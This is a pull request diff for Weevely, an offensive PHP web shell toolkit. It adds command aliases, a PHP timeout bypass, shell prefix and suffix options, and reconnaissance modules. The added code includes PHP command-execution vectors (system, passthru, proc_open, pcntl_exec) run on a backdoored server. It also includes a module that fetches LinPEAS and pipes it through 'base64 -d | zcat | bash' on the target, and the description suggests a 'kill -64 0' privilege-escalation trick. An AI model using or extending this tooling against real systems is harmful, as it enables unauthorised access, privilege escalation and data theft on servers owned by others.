### PR TITLE
Add :max_time_bypass, :alias and :shell_sh -prefix

### DIFF
--- a/core/messages.py
+++ b/core/messages.py
@@ -77,8 +77,12 @@ following command replacements to simulate a unrestricted shell.
     unalias_help = 'Add an alias'
     show_alias_help = 'Show an alias'
     list_alias_help = 'List all aliases'
+    max_time_help = 'Toggle max_execution_time bypass'
     set_usage = 'Set session variable (run :show to print). Usage:\n:set <variable> \'<value>\''
     unset_usage = 'Unset session variable (run :show to print). Usage:\n:unset <variable>'
+
+    max_time_status = 'Bypass for max_execution_time is {}'
+
 
 class vectors:
     wrong_target_type = 'Wrong target operating system type'

--- a/core/messages.py
+++ b/core/messages.py
@@ -69,6 +69,14 @@ following command replacements to simulate a unrestricted shell.
 [+] Browse the filesystem or execute commands starts the connection
 [+] to the target. Type :help for more information.
 """
+    help_help = 'Show this help text'
+    set_help = 'Set a global setting'
+    unset_help = 'Unset a global setting'
+    show_help = 'List all settings'
+    alias_help = 'Add an alias'
+    unalias_help = 'Add an alias'
+    show_alias_help = 'Show an alias'
+    list_alias_help = 'List all aliases'
     set_usage = 'Set session variable (run :show to print). Usage:\n:set <variable> \'<value>\''
     unset_usage = 'Unset session variable (run :show to print). Usage:\n:unset <variable>'
 

--- a/core/sessions.py
+++ b/core/sessions.py
@@ -16,7 +16,8 @@ import pprint
 print_filters = (
     'debug',
     'channel',
-    'proxy'
+    'proxy',
+    'max_time_bypass'
 )
 
 set_filters = (

--- a/core/sessions.py
+++ b/core/sessions.py
@@ -25,6 +25,7 @@ set_filters = (
     'proxy'
 )
 
+
 class Session(dict):
 
     def _session_save_atexit(self):
@@ -55,12 +56,12 @@ class Session(dict):
                     log.info(messages.sessions.set_s_s % (mod_name, mod_value))
 
     def get_connection_info(self):
-     return template.Template(messages.sessions.connection_info).render(
-         url = self['url'],
-         user = self['system_info']['results'].get('whoami', ''),
-         host = self['system_info']['results'].get('hostname', ''),
-         path = self['file_cd']['results'].get('cwd', '.')
-     )
+        return template.Template(messages.sessions.connection_info).render(
+            url = self['url'],
+            user = self['system_info']['results'].get('whoami', ''),
+            host = self['system_info']['results'].get('hostname', ''),
+            path = self['file_cd']['results'].get('cwd', '.')
+        )
 
     def load_session(self, data):
         """

--- a/core/terminal.py
+++ b/core/terminal.py
@@ -186,6 +186,7 @@ class Terminal(CmdModules):
                             ':set',
                             ':unset',
                             ':show',
+                            ':max_time',
                             ':help'
                         )
                     ):
@@ -290,7 +291,7 @@ class Terminal(CmdModules):
 
     def do_help(self, arg, command):
 
-        print('\nCommands:')
+        print('\nBuilt-in commands:')
 
         log.info(utils.prettify.tablify([
             ('help, :help', messages.terminal.help_help),
@@ -300,7 +301,8 @@ class Terminal(CmdModules):
             (':alias name "code"', messages.terminal.alias_help),
             (':unalias name', messages.terminal.unalias_help),
             (':alias name', messages.terminal.show_alias_help),
-            (':alias', messages.terminal.list_alias_help)
+            (':alias', messages.terminal.list_alias_help),
+            (':max_time', messages.terminal.max_time_help)
         ], table_border=False))
 
         super(Terminal, self).do_help(arg, command)
@@ -329,6 +331,18 @@ class Terminal(CmdModules):
         """Handles :unalias function"""
 
         self.user_aliases.unset(line)
+
+    def do_max_time(self, line, cmd):
+        """Toggles a session variable used by :shell_php module"""
+
+        k = 'max_time'
+
+        if k not in self.session:
+            self.session[k] = False
+
+        self.session[k] = not self.session[k]
+        status = 'ENABLED' if self.session[k] else 'DISABLED'
+        log.info(messages.terminal.max_time_status.format(status))
 
     def do_show(self, line, cmd):
         """Command "show" which prints session variables"""

--- a/core/terminal.py
+++ b/core/terminal.py
@@ -302,7 +302,7 @@ class Terminal(CmdModules):
             (':unalias name', messages.terminal.unalias_help),
             (':alias name', messages.terminal.show_alias_help),
             (':alias', messages.terminal.list_alias_help),
-            (':max_time', messages.terminal.max_time_help)
+            (':max_time_bypass', messages.terminal.max_time_help)
         ], table_border=False))
 
         super(Terminal, self).do_help(arg, command)
@@ -332,10 +332,10 @@ class Terminal(CmdModules):
 
         self.user_aliases.unset(line)
 
-    def do_max_time(self, line, cmd):
+    def do_max_time_bypass(self, line, cmd):
         """Toggles a session variable used by :shell_php module"""
 
-        k = 'max_time'
+        k = 'max_time_bypass'
 
         if k not in self.session:
             self.session[k] = False

--- a/core/user_aliases.py
+++ b/core/user_aliases.py
@@ -1,0 +1,101 @@
+from core.config import base_path
+from core.loggers import log
+
+import atexit
+
+
+class UserAliases:
+    """Handles user-defined aliases stored in a text file"""
+
+    def __init__(self, filepath=None):
+        self.aliases = {}
+        self.path = filepath if filepath else base_path + 'aliases'
+
+        if self.path is not None:
+            self.load_from_file(self.path)
+
+        atexit.register(self._session_save_atexit)
+
+    def _session_save_atexit(self):
+        with open(self.path, 'w') as f:
+            f.writelines(
+                ['{}={}\n'.format(alias, code) for alias, code in self.aliases.items()]
+            )
+            f.close()
+
+    def load(self, aliases):
+        """Loads aliases from a newline-delimited string"""
+        sep = '='
+        for line in aliases.split('\n'):
+            splitted = line.split(sep)
+            alias = splitted[0]
+            if alias in (None, ''):
+                continue
+            code = sep.join(splitted[1:])
+
+            self.set(alias, code)
+
+    def load_from_file(self, filename):
+        """Loads aliases from a file. One alias by line (format: name=code)"""
+        sep = '='
+        with open(filename, 'a+') as f:
+            f.seek(0)
+
+            for line in f:
+                splitted = line.rstrip().split(sep)
+                alias = splitted[0]
+                if alias in (None, ''):
+                    continue
+                code = sep.join(splitted[1:])
+
+                self.set(alias, code)
+
+            f.close()
+
+    def print_to_user(self, name=None):
+        if name is None:
+            for alias, code in self.aliases.items():
+                print('{} = {}'.format(alias, code))
+        else:
+            code = self.get(name)
+            if code is None:
+                log.warning('alias {} does not exist.'.format(name))
+            else:
+                print('alias {} = {}'.format(name, code))
+
+    def set(self, alias, code):
+        """User-called function which sets an alias"""
+        if not alias.isalpha():
+            log.warning('"{}" is not a valid alias name. Use only letters.'.format(alias))
+            return
+
+        self.aliases[alias] = code
+
+    def unset(self, alias):
+        """User-called function which removes an alias"""
+        if alias not in self.aliases:
+            log.warning('alias {} does not exist.'.format(name))
+
+        self.aliases.pop(alias)
+
+    def get(self, alias):
+        if alias not in self.aliases:
+            return None
+
+        return self.aliases[alias]
+
+    def apply(self, line):
+        """Applies alias transformation to the given command line.
+        If the command line matches no alias, it's returned untouched."""
+
+        argv = line.split(' ')
+
+        if len(argv) < 1:
+            return line
+
+        aliased = self.get(argv[0])
+
+        if aliased is None:
+            aliased = argv[0]
+
+        return ' '.join([aliased] +argv[1:])

--- a/modules/audit/fingerprint.py
+++ b/modules/audit/fingerprint.py
@@ -1,0 +1,49 @@
+from core.vectors import ShellCmd
+from core.module import Module
+
+# https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
+netstat_without_netstat = "grep -v 'rem_address' /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){ret=0;n=length(str);for(i=1;i<=n;i++){c=tolower(substr(str,i,1));k=index(\"123456789abcdef\",c);ret=ret*16+k;}return ret} {x=hextodec(substr($2,index($2,\":\")-2,2));for(i=5;i>0;i-=2)x=x\".\"hextodec(substr($2,i,2))}{print x\":\"hextodec(substr($2,index($2,\":\")+1,4))}' | grep -v ':0' | sort -u"
+
+class Fingerprint(Module):
+    """Find a few basic information about target"""
+
+    def init(self):
+        self.register_info(
+            {
+                'author': [
+                    'ZanyMonk'
+                ],
+                'license': 'GPLv3'
+            }
+        )
+
+        self.register_arguments([
+            {'name': 'rpath', 'help': 'Remote starting path (default: /)', 'default': '/', 'nargs': '?'},
+        ])
+
+    def run(self):
+        output = []
+        tests = {
+            'Current user': 'id',
+            'Local time': 'date',
+            'Hostname': 'uname -n',
+            'Address(es)': 'hostname -I',
+            'Kernel': 'echo $(uname -s) $(uname -n) $(uname -r) $(uname -v)',
+            'Processor': "cat /proc/cpuinfo | grep 'model name' | head -n1 | sed 's/.*: //'",
+            'Memory usage': 'free -h',
+            'Disk usage': 'df -h',
+            'Listening ports': f"ss -tlp || netstat -laputn | grep LISTEN || echo '(Without netstat)' && {netstat_without_netstat}",
+        }
+
+        for title in tests:
+            result = ShellCmd(
+                payload=tests[title],
+                arguments=[
+                    "-stderr_redirection",
+                    " 2>/dev/null",
+                ]).run(self.args)
+
+            output.append([title, result if len(result) else '[Empty]'])
+
+        # return output.split('\n')
+        return output

--- a/modules/audit/linpeas.py
+++ b/modules/audit/linpeas.py
@@ -1,0 +1,56 @@
+import base64
+import gzip
+import time
+
+from core.vectors import PhpCode
+from core.module import Module
+from utils.http import request
+
+SCRIPT_URL = 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh'
+
+
+class Linpeas(Module):
+    """Scan the target system with LinPEAS."""
+
+    script = None
+
+    def init(self):
+
+        self.register_info(
+            {
+                'author': [
+                    'ZanyMonk'
+                ],
+                'license': 'GPLv3'
+            }
+        )
+
+        self.register_arguments([
+            {'name': 'arguments', 'help': 'Arguments passed to LinPEAS (default: -a)', 'default': ['-a'], 'nargs': '*'},
+            {'name': '-output', 'help': 'Output destination', 'default': None},
+        ])
+
+    def run(self):
+        if self.script is None:
+            try:
+                self.get_script()
+            except Exception:
+                return 'Error: Could not download LinPEAS.'
+
+        if self.args['output'] is None:
+            self.args['output'] = '/tmp/.out_' + str(int(time.time()))
+
+        self.args['script'] = self.script.decode('utf-8')
+
+        PhpCode("""
+                $c = 'base64 -d | zcat | bash -s -- ${' '.join(arguments)} >> ${output} 2>&1';
+                $p = popen($c, 'w');
+                fwrite($p, '${script}');
+            """,
+            name='popen',
+            background=True).run(self.args)
+
+        return f"Scan started, output in {self.args['output']}"
+
+    def get_script(self):
+        self.script = base64.b64encode(gzip.compress(request(SCRIPT_URL)))

--- a/modules/audit/suidsgid.py
+++ b/modules/audit/suidsgid.py
@@ -1,12 +1,11 @@
 from core.vectors import ShellCmd
 from core.module import Module
 
-class Suidsgid(Module):
 
+class Suidsgid(Module):
     """Find files with SUID or SGID flags."""
 
     def init(self):
-
         self.register_info(
             {
                 'author': [
@@ -17,19 +16,28 @@ class Suidsgid(Module):
         )
 
         self.register_arguments([
-          { 'name' : 'rpath', 'help' : 'Remote starting path', 'default' : '/' },
-          { 'name' : '-only-suid', 'help' : 'Find only suid', 'action' : 'store_true', 'default' : False },
-          { 'name' : '-only-sgid', 'help' : 'Find only sgid', 'action' : 'store_true', 'default' : False },
+            {'name': 'rpath', 'help': 'Remote starting path (default: /)', 'default': '/', 'nargs': '?'},
+            {'name': '-only-suid', 'help': 'Find only suid', 'action': 'store_true', 'default': False},
+            {'name': '-only-sgid', 'help': 'Find only sgid', 'action': 'store_true', 'default': False},
+            {'name': '-uid', 'help': 'Filter by owner (default: -1, do not filter)', 'type': int, 'default': -1},
+            {'name': '-maxdepth', 'help': 'Max depth of recursion (default: 3)', 'default': 3},
         ])
 
     def run(self):
-
         result = ShellCmd(
-          payload = """find ${rpath} -type f ${ '-perm -04000' if not only_sgid else '' } ${ '-o' if not only_suid and not only_sgid else '' } ${ '-perm -02000' if not only_suid else '' }""",
-          arguments = [
-            "-stderr_redirection",
-            " 2>/dev/null",
-          ]).run(self.args)
+            payload="""
+                find ${rpath} -type f ${ ("-uid " + str(uid)) if uid > -1 else '' } \\
+                \( \\
+                  ${ '-perm -04000' if not only_sgid else '' } \\
+                  ${ '-o' if not only_suid and not only_sgid else '' } \\
+                  ${ '-perm -02000' if not only_suid else '' } \\
+                \) \\
+                -exec ls -hal {} +
+            """,
+            arguments=[
+                "-stderr_redirection",
+                " 2>/dev/null",
+            ]).run(self.args)
 
         if result:
             return result.split('\n')

--- a/modules/file/read.py
+++ b/modules/file/read.py
@@ -1,13 +1,15 @@
+import subprocess
+
 from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
 from core.module import Module
 from core import modules
 import tempfile
 
-class Read(Module):
 
+class Read(Module):
     """Read remote file from the remote filesystem."""
 
-    aliases = [ 'cat' ]
+    aliases = ['cat']
 
     def init(self):
 
@@ -21,26 +23,32 @@ class Read(Module):
         )
 
         self.register_arguments([
-          { 'name' : 'rpath', 'help' : 'Remote file path' },
-          { 'name' : '-vector', 'choices' : ( 'file', 'fread', 'file_get_contents', 'base64' ) }
+            {'name': 'rpath', 'help': 'Remote file path'},
+            {'name': '-less', 'help': 'Read output in less', 'action': 'store_true', 'default': False},
+            {'name': '-vector', 'choices': ('file', 'fread', 'file_get_contents', 'base64')}
         ])
 
     def run(self):
-
         # Get a temporary file name
         temp_file = tempfile.NamedTemporaryFile()
         self.args['lpath'] = temp_file.name
 
-        arg_vector = [ '-vector', self.args.get('vector') ] if self.args.get('vector') else []
+        arg_vector = ['-vector', self.args.get('vector')] if self.args.get('vector') else []
 
         # Run file_download
         result = ModuleExec(
-                    'file_download',
-                    [ self.args.get('rpath'), '${lpath}' ] + arg_vector,
-                    name = 'file_download'
-                ).run(self.args)
+            'file_download',
+            [self.args.get('rpath'), '${lpath}'] + arg_vector,
+            name='file_download'
+        ).run(self.args)
+
+        if self.args['less']:
+            subprocess.check_call(['less', temp_file.name])
 
         # Delete temp file
         temp_file.close()
+
+        if self.args['less']:
+            return ''
 
         return result

--- a/modules/shell/php.py
+++ b/modules/shell/php.py
@@ -90,11 +90,12 @@ class Php(Module):
 
         cwd = self._get_stored_result('cwd', module='file_cd', default='.')
         chdir = '' if cwd == '.' else "chdir('%s');" % cwd
+        bypass = Php.max_time_bypass if 'max_time_bypass' in self.session and self.session['max_time_bypass'] else ''
 
         # Compose command with cwd, pre_command, and post_command option.
         self.args.update({
             'chdir': chdir,
-            'bypass': Php.max_time_bypass if self.session['max_time_bypass'] else ''
+            'bypass': bypass
         })
         command = Template(
             """${chdir}${bypass}${prefix}${ ' '.join(command) }${suffix}""",

--- a/modules/shell/php.py
+++ b/modules/shell/php.py
@@ -10,6 +10,8 @@ import random
 class Php(Module):
     """Execute PHP commands."""
 
+    max_time_bypass = '@error_reporting(0);set_time_limit(0);@ignore_user_abort(1);ini_set(max_execution_time,0);'
+
     def init(self):
 
         self.register_info(
@@ -90,9 +92,12 @@ class Php(Module):
         chdir = '' if cwd == '.' else "chdir('%s');" % cwd
 
         # Compose command with cwd, pre_command, and post_command option.
-        self.args.update({'chdir': chdir})
+        self.args.update({
+            'chdir': chdir,
+            'bypass': Php.max_time_bypass if self.session['max_time'] else ''
+        })
         command = Template(
-            """${chdir}${prefix}${ ' '.join(command) }${suffix}""",
+            """${chdir}${bypass}${prefix}${ ' '.join(command) }${suffix}""",
             strict_undefined=True
         ).render(**self.args)
 

--- a/modules/shell/php.py
+++ b/modules/shell/php.py
@@ -94,7 +94,7 @@ class Php(Module):
         # Compose command with cwd, pre_command, and post_command option.
         self.args.update({
             'chdir': chdir,
-            'bypass': Php.max_time_bypass if self.session['max_time'] else ''
+            'bypass': Php.max_time_bypass if self.session['max_time_bypass'] else ''
         })
         command = Template(
             """${chdir}${bypass}${prefix}${ ' '.join(command) }${suffix}""",

--- a/modules/shell/sh.py
+++ b/modules/shell/sh.py
@@ -1,13 +1,10 @@
 from core.vectors import PhpCode
 from core.module import Module, Status
-from core.loggers import log
 from core.vectors import Os
-from core import messages
-from core import modules
 import random
 
-class Sh(Module):
 
+class Sh(Module):
     """Execute shell commands."""
 
     def init(self):
@@ -23,52 +20,56 @@ class Sh(Module):
 
         self.register_vectors(
             [
-            # All the system-like calls has to be properly wrapped between single quotes
-            PhpCode("""@system('${command}${stderr_redirection}');""", "system"),
-            PhpCode("""@passthru('${command}${stderr_redirection}');""", "passthru"),
-            PhpCode("""print(@shell_exec('${command}${stderr_redirection}'));""", "shell_exec"),
-            PhpCode("""$r=array(); @exec('${command}${stderr_redirection}', $r);print(join(\"\\n\",$r));""", "exec"),
-            PhpCode("""
-                $h=@popen('${command}','r');
-                if($h){
-                    while(!feof($h)) echo(fread($h,4096));
-                    pclose($h);
-                }""", "popen"),
-            PhpCode("""
-                $p = array(array('pipe', 'r'), array('pipe', 'w'), array('pipe', 'w'));
-                $h = @proc_open('${command}', $p, $pipes);
-                if($h&&$pipes){
-                    while(!feof($pipes[1])) echo(fread($pipes[1],4096));
-                    while(!feof($pipes[2])) echo(fread($pipes[2],4096));
-                    fclose($pipes[0]);
-                    fclose($pipes[1]);
-                    fclose($pipes[2]);
-                    proc_close($h);
-                }""", "proc_open"),
-            PhpCode("""@python_eval('import os; os.system('${command}${stderr_redirection}');');""", "python_eval"),
-            PhpCode("""
-                if(class_exists('Perl')){
-                    $perl=new Perl();
-                    $r=$perl->system('${command}${stderr_redirection}');
-                    print($r);
-                }""", "perl_system"),
-            # pcntl_fork is unlikely, cause is callable just as CGI or from CLI.
-            PhpCode("""
-                if(is_callable('pcntl_fork')) {
-                    $p=@pcntl_fork();
-                    if(!$p){
-                        @pcntl_exec("/bin/sh",Array("-c",'${command}'));
-                    } else {
-                        @pcntl_waitpid($p,$status);
-                    }
-                }""",
-                name="pcntl", target=Os.NIX),
-            ])
+                # All the system-like calls has to be properly wrapped between single quotes
+                PhpCode("""@system('${command}${stderr_redirection}');""", "system"),
+                PhpCode("""@passthru('${command}${stderr_redirection}');""", "passthru"),
+                PhpCode("""print(@shell_exec('${command}${stderr_redirection}'));""", "shell_exec"),
+                PhpCode("""$r=array(); @exec('${command}${stderr_redirection}', $r);print(join(\"\\n\",$r));""",
+                        "exec"),
+                PhpCode("""
+                    $h=@popen('${command}','r');
+                    if($h){
+                        while(!feof($h)) echo(fread($h,4096));
+                        pclose($h);
+                    }""", "popen"),
+                PhpCode("""
+                    $p = array(array('pipe', 'r'), array('pipe', 'w'), array('pipe', 'w'));
+                    $h = @proc_open('${command}', $p, $pipes);
+                    if($h&&$pipes){
+                        while(!feof($pipes[1])) echo(fread($pipes[1],4096));
+                        while(!feof($pipes[2])) echo(fread($pipes[2],4096));
+                        fclose($pipes[0]);
+                        fclose($pipes[1]);
+                        fclose($pipes[2]);
+                        proc_close($h);
+                    }""", "proc_open"),
+                PhpCode("""@python_eval('import os; os.system('${command}${stderr_redirection}');');""", "python_eval"),
+                PhpCode("""
+                    if(class_exists('Perl')){
+                        $perl=new Perl();
+                        $r=$perl->system('${command}${stderr_redirection}');
+                        print($r);
+                    }""", "perl_system"),
+                # pcntl_fork is unlikely, cause is callable just as CGI or from CLI.
+                PhpCode("""
+                    if(is_callable('pcntl_fork')) {
+                        $p=@pcntl_fork();
+                        if(!$p){
+                            @pcntl_exec("/bin/sh",Array("-c",'${command}'));
+                        } else {
+                            @pcntl_waitpid($p,$status);
+                        }
+                    }""",
+                        name="pcntl", target=Os.NIX),
+            ]
+        )
 
         self.register_arguments([
-          { 'name' : 'command', 'help' : 'Shell command', 'nargs' : '+' },
-          { 'name' : '-stderr_redirection', 'default' : ' 2>&1' },
-          { 'name' : '-vector', 'choices' : self.vectors.get_names() },
+            {'name': 'command', 'help': 'Shell command', 'nargs': '+'},
+            {'name': '-stderr_redirection', 'default': ' 2>&1'},
+            {'name': '-vector', 'choices': self.vectors.get_names()},
+            {'name': '-prefix', 'default': ''},
+            {'name': '-suffix', 'default': ''},
         ])
 
     def setup(self):
@@ -88,21 +89,21 @@ class Sh(Module):
         check_digits = str(random.randint(11111, 99999))
 
         args_check = {
-                    'command': 'echo %s' % check_digits,
-                    'stderr_redirection': ''
+            'command': 'echo %s' % check_digits,
+            'stderr_redirection': ''
         }
 
         (vector_name,
          result) = self.vectors.find_first_result(
-          names = [ self.args.get('vector', '') ],
-            format_args = args_check,
-            condition = lambda result: (
+            names=[self.args.get('vector', '')],
+            format_args=args_check,
+            condition=lambda r: (
                 # Stop if shell_php is not running
                 self.session['shell_php']['status'] != Status.RUN or
                 # Or if the result is correct
-                result and result.rstrip() == check_digits
-                )
+                r and r.rstrip() == check_digits
             )
+        )
 
         if self.session['shell_php']['status'] == Status.RUN and result and result.rstrip() == check_digits:
             self.session['shell_sh']['stored_args']['vector'] = vector_name
@@ -112,14 +113,15 @@ class Sh(Module):
 
     def run(self):
 
-        # Join the command list and
-
         # Escape the single quotes. This does not protect from \' but
         # avoid to break the query for an unscaped quote.
-
-        self.args['command'] = ' '.join(self.args['command']).replace("'", "\\'")
+        self.args['command'] = (
+            self.args.get('prefix', '')
+            + ' '.join(self.args['command']).replace("'", "\\'")
+            + self.args.get('suffix', '')
+        )
 
         return self.vectors.get_result(
-         name = self.args['vector'],
-         format_args = self.args
+            name=self.args['vector'],
+            format_args=self.args
         )

--- a/modules/sql/console.py
+++ b/modules/sql/console.py
@@ -22,11 +22,11 @@ class Console(Module):
         self.register_vectors(
             [
                 PhpCode(
-                    """if($s=mysqli_connect('${host}','${user}','${passwd}')){$r=mysqli_query($s,'${query}');if($r){$f=mysqli_fetch_fields($r);foreach($f as $v){echo $v->name.'${linsep}';};echo '${colsep}';while($c=mysqli_fetch_row($r)){echo implode('${linsep}',$c);echo '${linsep}${colsep}';}};}echo '${errsep}'.@mysqli_connect_error().' '.@mysqli_error($s);@mysqli_close($s);""",
+                    """if($s=mysqli_connect('${host}','${user}','${passwd}','','${port}')){$r=mysqli_query($s,'${query}');if($r){$f=mysqli_fetch_fields($r);foreach($f as $v){echo $v->name.'${linsep}';};echo '${colsep}';while($c=mysqli_fetch_row($r)){echo implode('${linsep}',$c);echo '${linsep}${colsep}';}};}echo '${errsep}'.@mysqli_connect_error().' '.@mysqli_error($s);@mysqli_close($s);""",
                     name='mysql',
                 ),
                 PhpCode(
-                    """if($s=mysqli_connect('${host}','${user}','${passwd}','${database}')){$r=mysqli_query($s,'${query}');if($r){$f=mysqli_fetch_fields($r);foreach($f as $v){echo $v->name.'${linsep}';};echo '${colsep}';while($c=mysqli_fetch_row($r)){echo implode('${linsep}',$c);echo '${linsep}${colsep}';}};}echo '${errsep}'.@mysqli_connect_error().' '.@mysqli_error($s);@mysqli_close($s);""",
+                    """if($s=mysqli_connect('${host}','${user}','${passwd}','${database}','${port}')){$r=mysqli_query($s,'${query}');if($r){$f=mysqli_fetch_fields($r);foreach($f as $v){echo $v->name.'${linsep}';};echo '${colsep}';while($c=mysqli_fetch_row($r)){echo implode('${linsep}',$c);echo '${linsep}${colsep}';}};}echo '${errsep}'.@mysqli_connect_error().' '.@mysqli_error($s);@mysqli_close($s);""",
                     name='mysql_database',
                 ),
                 PhpCode(
@@ -34,11 +34,11 @@ class Console(Module):
                     name="mysql_fallback"
                 ),
                 PhpCode(
-                    """if(pg_connect('host=${host} user=${user} password=${passwd}')){$r=pg_query('${query}');if($r){while($c=pg_fetch_row($r)){foreach($c as $key=>$value){echo $value.'${linsep}';}echo '${colsep}';}};pg_close();}echo '${errsep}'.@pg_last_error();""",
+                    """if(pg_connect('host=${host} port=${port} user=${user} password=${passwd}')){$r=pg_query('${query}');if($r){while($c=pg_fetch_row($r)){foreach($c as $key=>$value){echo $value.'${linsep}';}echo '${colsep}';}};pg_close();}echo '${errsep}'.@pg_last_error();""",
                     name="pgsql"
                 ),
                 PhpCode(
-                    """if(pg_connect('host=${host} user=${user} dbname=${database} password=${passwd}')){$r=pg_query('${query}');if($r){while($c=pg_fetch_row($r)){foreach($c as $key=>$value){echo $value.'${linsep}';}echo '${colsep}';}};pg_close();}echo '${errsep}'.@pg_last_error();""",
+                    """if(pg_connect('host=${host} port=${port} user=${user} dbname=${database} password=${passwd}')){$r=pg_query('${query}');if($r){while($c=pg_fetch_row($r)){foreach($c as $key=>$value){echo $value.'${linsep}';}echo '${colsep}';}};pg_close();}echo '${errsep}'.@pg_last_error();""",
                     name="pgsql_database"
                 ),
                 PhpCode(
@@ -54,6 +54,7 @@ class Console(Module):
             {'name': '-host', 'help': 'Db host (default: localhost)', 'nargs': '?', 'default': 'localhost'},
             {'name': '-dbms', 'help': 'Db type', 'choices': ('mysql', 'pgsql'), 'default': 'mysql'},
             {'name': '-database', 'help': 'Database name'},
+            {'name': '-port', 'help': 'Port number', 'default': None},
             {'name': '-query', 'help': 'Execute a single query'},
             {'name': '-encoding', 'help': 'Db text encoding', 'default': 'utf-8'},
         ])
@@ -71,6 +72,10 @@ class Console(Module):
 
         # Escape ' in query strings
         self.args['query'] = self.args['query'].replace('\\', '\\\\').replace('\'', '\\\'')
+
+        # Set default port depending on selected dbms
+        if self.args['port'] is None:
+            self.args['port'] = '5432' if self.args['dbms'] == 'pgsql' else '3306'
 
         result = self.vectors.get_result(vector, args)
 

--- a/weevely.py
+++ b/weevely.py
@@ -54,7 +54,7 @@ def main(arguments):
     modules.load_modules(session)
 
     if not arguments.cmd:
-        Terminal(session).cmdloop()
+        Terminal(session, arguments.aliases).cmdloop()
     else:
         Terminal(session).onecmd(arguments.cmd)
 
@@ -64,6 +64,8 @@ if __name__ == '__main__':
     subparsers = parser.add_subparsers(dest = 'command')
 
     terminalparser = subparsers.add_parser('terminal', help='Run terminal or command on the target')
+    terminalparser.add_argument('-a', '--aliases', help = 'Path to file containing aliases',
+                                default=None)
     terminalparser.add_argument('url', help = 'The agent URL')
     terminalparser.add_argument('password', help = 'The agent password')
     terminalparser.add_argument('cmd', help = 'Command', nargs='?')


### PR DESCRIPTION
## Additions
### Max exec time bypass (from wiki)
Toggle the bypass with `:max_time_bypass`. Value is stored in session.

Bypass is inserted before `-prefix` value.

### User-defined aliases
Those are simple "translations" that are applied to your command lines.

For example if you do `:alias ll "ls -lha"`, then if the command `ll <args>` is called, `ls -lha <args>` is executed instead.

Aliases get saved in a text file (`{base_path}/aliases` by default, `terminal` mode can be started with `-a <path>` option to set a custom alias file). This file is automatically saved when exiting weevely.
- `:alias <name> <command>` defines a new alias
- `:alias <name>` shows an alias
- `:alias` lists all aliases
- `:unalias <name>` removes an alias

### Shell modules (pre|suf)fix
`:shell_sh` module has now two more options: `-prefix` and `-suffix`.
`:shell_php` module options `-prefix-string` and `-postfix-string` have been renamed to only `-prefix` and `-suffix`.

Pretty useful to run commands with some shaky privesc trick like `kill -64 0 && id`, by doing `:set shell_sh.prefix "kill -64 0 && "`